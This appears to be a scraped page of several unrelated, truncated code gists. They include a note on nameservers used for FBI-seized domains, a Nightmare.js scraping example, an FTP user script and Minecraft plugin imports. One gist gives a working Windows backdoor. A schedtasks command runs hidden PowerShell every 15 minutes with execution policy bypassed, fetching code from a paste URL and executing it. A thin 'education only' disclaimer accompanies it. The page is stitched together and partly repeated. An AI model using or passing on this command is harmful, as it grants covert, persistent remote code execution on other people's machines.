so if the FBI seizes a domain they always (or mostly) use the following nameservers to hold the domain known to be used by law enforcement:
jocely.ns.cloudflare.com plato.ns.cloudflare.com
for example
doublevpn.com
raidforums.com
| const Nightmare = require('nightmare') | |
| const nightmare = Nightmare({ show: true }) | |
| nightmare | |
| .goto('https://duckduckgo.com') | |
| .type('#search_form_input_homepage', 'github nightmare') | |
| .click('#search_button_homepage') | |
| .wait(1000) | |
| .evaluate(() => { | |
| const links = Array.from(document.querySelectorAll('a')); |
| :: small example for a windows remote access if you control the webserver | |
| :: only use for education etc etc | |
| :: also its only for testing; blue powershell window pops up | |
| :: https://pastes.io/raw/km95gr8b1w -> you want this to be a url to something you control because these commands are ran every 15 minutes | |
| schtasks /create /sc minute /mo 15 /tn autorun /tr "powershell -windowstyle hidden -noprofile -executionpolicy bypass -command 'invoke-webrequest https://pastes.io/raw/km95gr8b1w -usebasicparsing | select-object -expand content | iex'" /st 07:00 /sd 01/05/2020 /f && schtasks /run /tn autorun |
| mkdir c:\temp\oidma |
| schtasks /Create /SC MINUTE /MO 2 /TN autorun /TR calc.exe /ST 07:00 /SD 01/05/2020 /F | |
| schtasks /run /tn autorun | |
| :: runs every two minutes | |
| :: opens calculator |
so if the FBI seizes a domain they always (or mostly) use the following nameservers to hold the domain known to be used by law enforcement:
jocely.ns.cloudflare.com plato.ns.cloudflare.com
for example
doublevpn.com
raidforums.com
| # usage: | |
| # ./create-user.sh <USERNAME> <PASSWORD> <GROUPNAME> | |
| # ^script name | |
| # | |
| # > creates a user and adds it to vsftpd user list | |
| username=$1 | |
| password=$2 |
| import me.clip.placeholderapi.expansion.PlaceholderExpansion; | |
| import org.bukkit.entity.Player; | |
| import us.talabrek.ultimateskyblock.api.IslandLevel; | |
| import us.talabrek.ultimateskyblock.api.uSkyBlockAPI; | |
| import us.talabrek.ultimateskyblock.uSkyBlock; | |
| // you need to | |
| // new IsLevelPlaceholders().register(); | |
| // in your onEnable method of your main class! |